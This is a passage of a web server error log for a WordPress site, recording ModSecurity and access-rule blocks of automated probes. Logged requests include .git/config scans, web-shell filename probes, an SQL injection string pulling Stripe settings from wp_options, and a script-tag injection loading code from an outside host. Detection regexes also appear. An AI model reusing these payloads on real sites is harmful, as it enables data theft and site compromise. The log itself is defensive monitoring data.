"/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: md5( found within ARGS:msfacai: die(md5(24334));"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-admin/css/colors/blue/clean.php"] [unique_id "ZjgnbgMTMGznsu3f7AFfNgAAAAA"], referer: investigacionperu.com [Mon May 06 03:14:18.020258 2024] [ssl:warn] [pid 32296:tid 140463698593664] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon May 06 03:14:26.244568 2024] [ssl:warn] [pid 32302:tid 140463698593664] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon May 06 03:14:26.747682 2024] [ssl:warn] [pid 32302:tid 140463698593664] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon May 06 03:14:29.463548 2024] [ssl:warn] [pid 32302:tid 140463698593664] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon May 06 03:14:31.809844 2024] [ssl:warn] [pid 347:tid 140377771140992] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon May 06 03:14:40.025481 2024] [ssl:warn] [pid 348:tid 140377771140992] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name 2024/05/06 08:46:53 [error] 32696#32696: *351207 access forbidden by rule, client: 203.55.81.29, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/05/06 08:53:11 [error] 32697#32697: *351276 access forbidden by rule, client: 203.55.81.29, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/05/06 11:01:48 [error] 32697#32697: *352461 access forbidden by rule, client: 103.102.228.23, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" [Tue May 07 03:31:24.931603 2024] [ssl:warn] [pid 17771:tid 140294009870208] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue May 07 03:31:33.137408 2024] [ssl:warn] [pid 17778:tid 140294009870208] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue May 07 03:31:33.600401 2024] [ssl:warn] [pid 17778:tid 140294009870208] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue May 07 03:31:35.701452 2024] [ssl:warn] [pid 17778:tid 140294009870208] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue May 07 03:31:37.923531 2024] [ssl:warn] [pid 18194:tid 140444955301760] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name 2024/05/07 03:31:38 [error] 18174#18174: *364520 access forbidden by rule, client: 216.225.198.176, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Tue May 07 03:31:50.135631 2024] [ssl:warn] [pid 18197:tid 140444955301760] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue May 07 16:18:16.326620 2024] [autoindex:error] [pid 18214:tid 140444541310720] [client 4.227.105.22:42188] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com 2024/05/07 21:24:33 [error] 18175#18175: *377203 access forbidden by rule, client: 203.55.81.29, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/05/07 21:40:48 [error] 18174#18174: *377483 access forbidden by rule, client: 203.55.81.29, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/05/08 01:38:43 [error] 18174#18174: *380300 access forbidden by rule, client: 103.102.228.23, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" [Wed May 08 03:47:33.575511 2024] [ssl:warn] [pid 18562:tid 140648234182528] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed May 08 03:47:35.806625 2024] [ssl:warn] [pid 18563:tid 140648234182528] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed May 08 03:47:36.307460 2024] [ssl:warn] [pid 18563:tid 140648234182528] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed May 08 03:47:38.932737 2024] [ssl:warn] [pid 18563:tid 140648234182528] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed May 08 03:47:41.261884 2024] [ssl:warn] [pid 18981:tid 139719674496896] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed May 08 03:47:41.462746 2024] [ssl:warn] [pid 18982:tid 139719674496896] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed May 08 05:20:07.305574 2024] [:error] [pid 19002:tid 139719483356928] [client 143.198.82.234:37332] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/license.php, referer: www.google.com [Wed May 08 11:13:27.724914 2024] [authz_core:error] [pid 19636:tid 139719491749632] [client 146.190.242.161:47120] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/05/08 11:13:30 [error] 18962#18962: *387281 access forbidden by rule, client: 146.190.242.161, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Wed May 08 11:39:17.463552 2024] [authz_core:error] [pid 19002:tid 139719295850240] [client 157.245.36.108:48298] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/05/08 11:39:23 [error] 18962#18962: *387796 access forbidden by rule, client: 157.245.36.108, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Wed May 08 12:18:49.903393 2024] [:error] [pid 19002:tid 139719346206464] [client 103.155.93.244:49992] [client 103.155.93.244] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[^>]*>|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[[\\\\s\\\\S]]*[\\\\s\\\\S]|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[\\\\s]*[\\\\s]|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script|<script[^>]*>[\\\\s\\\\S]*?)" at ARGS:result[_msg]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "14"] [id "973336"] [rev "1"] [msg "XSS Filter - Category 1: Script Tag Vector"] [data "Matched Data: <script src=https://cloud.cdndynamic.com></script> found within ARGS:result[_msg]: <script src=https://cloud.cdndynamic.com></script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "investigacionperu.com"] [uri "/wp-json/litespeed/v1/cdn_status"] [unique_id "Zjuz-YKlHe45f5rcEz36pQAAAIk"] [Wed May 08 14:28:59.442790 2024] [authz_core:error] [pid 25336:tid 139719458178816] [client 143.244.168.161:53368] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/05/08 14:29:01 [error] 18962#18962: *389929 access forbidden by rule, client: 143.244.168.161, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/05/08 16:03:01 [error] 18962#18962: *390873 access forbidden by rule, client: 3.84.118.17, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/05/08 19:05:32 [error] 18962#18962: *393094 access forbidden by rule, client: 3.84.118.17, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/05/08 20:50:44 [error] 18962#18962: *393848 access forbidden by rule, client: 3.84.118.17, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" [Thu May 09 03:18:24.666375 2024] [ssl:warn] [pid 9692:tid 140240797751168] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu May 09 03:18:36.880798 2024] [ssl:warn] [pid 9694:tid 140240797751168] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu May 09 03:18:37.318730 2024] [ssl:warn] [pid 9694:tid 140240797751168] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu May 09 03:18:39.591527 2024] [ssl:warn] [pid 9694:tid 140240797751168] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu May 09 03:18:41.986690 2024] [ssl:warn] [pid 10171:tid 140141067741056] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu May 09 03:18:50.187635 2024] [ssl:warn] [pid 10173:tid 140141067741056] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name 2024/05/09 09:29:57 [error] 10153#10153: *401495 access forbidden by rule, client: 54.167.95.48, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "INVESTIGACIONPERU.COM" [Thu May 09 09:42:32.214410 2024] [:error] [pid 10190:tid 140140868208384] [client 103.138.151.22:56498] [client 103.138.151.22] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(union(.*?)select(.*?)from)))" at ARGS:calculate_attribute_counts[][taxonomy]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "225"] [id "981276"] [msg "Looking for basic sql injection. Common attack string for mysql, oracle and others."] [data "Matched Data: union%20all%20select%201%2Coption_value%20from found within ARGS:calculate_attribute_counts[][taxonomy]: %22%29%20union%20all%20select%201%2Coption_value%20from%20wp_options%20where%20option_name%20like%20%27%25stripe%25%27%3B%00"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "investigacionperu.com"] [uri "/wp-json/wc/store/products/collection-data"] [unique_id "Zjzg2C5OYTSSyQXtKaRgIQAAAAI"] [Thu May 09 22:25:24.309311 2024] [autoindex:error] [pid 10802:tid 140140739548928] [client 159.223.34.107:49120] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Fri May 10 03:50:24.460967 2024] [ssl:warn] [pid 13145:tid 139977379231616] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri May 10 03:50:28.740911 2024] [ssl:warn] [pid 13152:tid 139977379231616] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri May 10 03:50:29.386254 2024] [ssl:warn] [pid 13152:tid 139977379231616] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri May 10 03:50:31.152062 2024] [ssl:warn] [pid 13152:tid 139977379231616] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri May 10 03:50:33.449624 2024] [ssl:warn] [pid 13569:tid 140348538988416] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri May 10 03:50:37.646112 2024] [ssl:warn] [pid 13570:tid 140348538988416] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat May 11 03:34:22.144291 2024] [ssl:warn] [pid 11405:tid 139854485571456] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat May 11 03:34:30.369408 2024] [ssl:warn] [pid 11409:tid 139854485571456] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat May 11 03:34:30.748745 2024] [ssl:warn] [pid 11409:tid 139854485571456] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat May 11 03:34:32.603431 2024] [ssl:warn] [pid 11409:tid 139854485571456] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat May 11 03:34:34.866381 2024] [ssl:warn] [pid 11832:tid 140122228565888] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat May 11 03:34:47.095247 2024] [ssl:warn] [pid 11833:tid 140122228565888] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat May 11 03:34:47.821753 2024] [ssl:warn] [pid 11833:tid 140122228565888] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat May 11 12:06:44.804103 2024] [autoindex:error] [pid 12599:tid 140121856747264] [client 159.89.169.13:50394] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat May 11 17:09:10.409076 2024] [:error] [pid 12599:tid 140121957459712] [client 185.16.39.176:57482] [client 185.16.39.176] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:fw. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:fw: fwrite"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-term.php"] [unique_id "Zj_shvN4mmUBhmL2SyqYQQAAAMI"], referer: https://www.google.com [Sat May 11 17:09:13.617810 2024] [:error] [pid 12599:tid 140121907103488] [client 185.16.39.176:57484] [client 185.16.39.176] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:fw. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:fw: fwrite"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/wp-term.php"] [unique_id "Zj_sifN4mmUBhmL2SyqYQgAAAMg"], referer: https://www.google.com [Sat May 11 17:09:15.297602 2024] [:error] [pid 12599:tid 140121823176448] [client 185.16.39.176:57486] [client 185.16.39.176] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:fw. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:fw: fwrite"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-term.php"] [unique_id "Zj_si_N4mmUBhmL2SyqYQwAAANI"], referer: https://www.google.com 2024/05/12 01:41:03 [error] 11950#11950: *434152 access forbidden by rule, client: 192.159.99.18, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Sun May 12 03:20:17.766189 2024] [ssl:warn] [pid 22297:tid 140267456268160] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun May 12 03:20:26.001842 2024] [ssl:warn] [pid 22298:tid 140267456268160] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun May 12 03:20:26.349452 2024] [ssl:warn] [pid 22298:tid 140267456268160] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun May 12 03:20:28.117829 2024] [ssl:warn] [pid 22298:tid 140267456268160] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun May 12 03:20:30.372737 2024] [ssl:warn] [pid 22750:tid 140029505349504] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun May 12 03:20:38.571029 2024] [ssl:warn] [pid 22753:tid 140029505349504] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name 2024/05/12 04:30:43 [error] 22633#22633: *435439 access forbidden by rule, client: 23.137.104.52, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Sun May 12 07:51:44.043388 2024] [:error] [pid 22775:tid 140029322602240] [client 104.234.53.249:51356] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/iR7SzrsOUEP.php [Sun May 12 07:51:55.619440 2024] [:error] [pid 23437:tid 140029129082624] [client 104.234.53.249:51394] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/atomlib.php [Sun May 12 07:51:56.396613 2024] [:error] [pid 22775:tid 140029305816832] [client 104.234.53.249:51398] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/moon.php [Sun May 12 07:51:59.220815 2024] [:error] [pid 23437:tid 140029171046144] [client 104.234.53.249:51408] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/class_api.php [Sun May 12 07:51:59.977042 2024] [:error] [pid 23437:tid 140029305816832] [client 104.234.53.249:51412] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/upfile.php [Sun May 12 07:52:06.371585 2024] [autoindex:error] [pid 22775:tid 140029154260736] [client 104.234.53.249:51444] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/css/index.php [Sun May 12 07:52:19.403003 2024] [:error] [pid 22773:tid 140029053548288] [client 104.234.53.249:51480] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/install.php [Sun May 12 07:52:20.891074 2024] [:error] [pid 23437:tid 140029154260736] [client 104.234.53.249:51486] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/install.php [Sun May 12 07:52:24.627252 2024] [:error] [pid 22773:tid 140029162653440] [client 104.234.53.249:51498] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Sun May 12 07:52:33.321259 2024] [autoindex:error] [pid 23437:tid 140029196224256] [client 104.234.53.249:51522] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/coffee/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/css/colors/coffee/index.php [Sun May 12 07:52:35.604510 2024] [:error] [pid 23437:tid 140029171046144] [client 104.234.53.249:51530] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Sun May 12 07:52:39.893643 2024] [:error] [pid 23437:tid 140029145868032] [client 104.234.53.249:51544] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Sun May 12 07:52:44.219808 2024] [autoindex:error] [pid 23437:tid 140029137475328] [client 104.234.53.249:51558] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/plugins/compat3x/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/js/tinymce/plugins/compat3x/css/index.php [Sun May 12 07:52:44.324430 2024] [autoindex:error] [pid 23437:tid 140029221402368] [client 104.234.53.249:51560] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/blue/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun May 12 07:53:11.743805 2024] [:error] [pid 22775:tid 140029112297216] [client 104.234.53.249:51650] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/system.php [Sun May 12 07:53:27.536674 2024] [autoindex:error] [pid 22774:tid 140029129082624] [client 104.234.53.249:51694] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/skins/lightgray/img/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/js/tinymce/skins/lightgray/img/index.php?p= [Sun May 12 07:53:42.647332 2024] [:error] [pid 22775:tid 140029322602240] [client 104.234.53.249:51740] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/class.api.php [Sun May 12 07:53:51.771954 2024] [:error] [pid 23437:tid 140029171046144] [client 104.234.53.249:51768] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/sts.php [Sun May 12 07:53:54.701321 2024] [:error] [pid 23437:tid 140029120689920] [client 104.234.53.249:51782] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/db-update.php [Sun May 12 07:54:00.288754 2024] [:error] [pid 22775:tid 140029137475328] [client 104.234.53.249:51800] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/set.php [Sun May 12 07:54:14.012846 2024] [autoindex:error] [pid 22775:tid 140029162653440] [client 104.234.53.249:51846] AH01276: Cannot serve directory /home/investig/public_html/.well-known/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun May 12 07:54:33.968969 2024] [:error] [pid 23437:tid 140029078726400] [client 104.234.53.249:51906] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/iR7SzrsOUEP.php [Sun May 12 07:54:34.931545 2024] [:error] [pid 23437:tid 140029070333696] [client 104.234.53.249:51912] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/wp-login.php [Sun May 12 07:54:35.973154 2024] [:error] [pid 22773:tid 140029120689920] [client 104.234.53.249:51920] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/license.php [Sun May 12 07:54:37.009564 2024] [autoindex:error] [pid 22775:tid 140029322602240] [client 104.234.53.249:51924] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/skins/lightgray/img/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/js/tinymce/skins/lightgray/img/index.php [Sun May 12 07:55:49.683671 2024] [:error] [pid 23437:tid 140029145868032] [client 104.234.53.249:52140] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/themes.php [Sun May 12 07:56:00.495430 2024] [:error] [pid 22773:tid 140029204616960] [client 104.234.53.249:52178] PHP Fatal error: Uncaught Error: Call to undefined function get_header() in /home/investig/public_html/wp-content/themes/twentytwenty/404.php:10 [Sun May 12 07:56:00.495525 2024] [:error] [pid 22773:tid 140029204616960] [client 104.234.53.249:52178] Stack trace: [Sun May 12 07:56:00.495540 2024] [:error] [pid 22773:tid 140029204616960] [client 104.234.53.249:52178] #0 {main} [Sun May 12 07:56:00.495637 2024] [:error] [pid 22773:tid 140029204616960] [client 104.234.53.249:52178] thrown in /home/investig/public_html/wp-content/themes/twentytwenty/404.php on line 10 2024/05/12 12:59:34 [error] 22632#22632: *441037 access forbidden by rule, client: 152.228.209.80, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2024/05/12 13:35:36 [error] 22633#22633: *441437 access forbidden by rule, client: 83.147.52.42, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" [Sun May 12 15:55:38.009478 2024] [authz_core:error] [pid 23437:tid 140029221402368] [client 164.92.244.132:34056] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/05/12 15:55:42 [error] 22633#22633: *442409 access forbidden by rule, client: 164.92.244.132, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Sun May 12 16:26:09.039356 2024] [authz_core:error] [pid 22774:tid 140029112297216] [client 159.223.132.86:34842] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/05/12 16:26:12 [error] 22633#22633: *442709 access forbidden by rule, client: 159.223.132.86, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Sun May 12 18:22:10.634841 2024] [authz_core:error] [pid 22774:tid 140029070333696] [client 167.172.232.142:37616] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/05/12 18:22:15 [error] 22632#22632: *443771 access forbidden by rule, client: 167.172.232.142, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Sun May 12 18:49:08.744091 2024] [authz_core:error] [pid 22775:tid 140029112297216] [client 159.65.18.197:38150] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/05/12 18:49:13 [error] 22633#22633: *443912 access forbidden by rule, client: 159.65.18.197, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Mon May 13 03:10:18.681769 2024] [ssl:warn] [pid 2968:tid 140615264634752] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon May 13 03:10:26.952631 2024] [ssl:warn] [pid 2969:tid 140615264634752] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon May 13 03:10:27.343229 2024] [ssl:warn] [pid 2969:tid 140615264634752] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon May 13 03:10:29.347820 2024] [ssl:warn] [pid 2969:tid 140615264634752] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon May 13 03:10:31.646728 2024] [ssl:warn] 